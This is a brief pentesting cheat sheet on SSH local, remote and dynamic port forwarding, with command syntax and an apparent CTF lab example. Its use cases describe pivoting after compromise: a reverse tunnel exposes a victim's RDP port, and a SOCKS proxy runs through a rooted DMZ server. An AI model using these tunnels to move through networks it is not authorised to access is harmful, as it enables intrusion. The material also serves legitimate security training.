SSH Tunneling

Local Port Forwarding

ssh <gateway> -L <local port to listen>:<remote host>:<remote port> <user>@<remote_ip>

example:

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.133.4

Remote Port Forwarding

Allows us to tunnel a remote port to a local server

• Use case: you root an internal machine then use remote port forwarding to create a reverse SSH tunnel with your attacking machine through which you expose the victim's RDP port on your attacking machine on port 3390

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic Port Forwarding

Dynamic port forwarding allows us to set a local listening port and have it tunnel incoming traffic to any remote destination through a proxy

• use case: We have a rooted a DMZ server and the server has both port 80 and port 2222 exposed to the internet. We can create a SOCKS4 proxy on our local attacking box on 8080, which will tunnel all incoming traffic to any host in the DMZ network, through the compromised we server.

ssh -D <local proxy port> -p <remote port> <target>

ssh -nNT -f -L 8080:localhost:80 user@<remote_ip>

ps aux | grep ssh > kill pid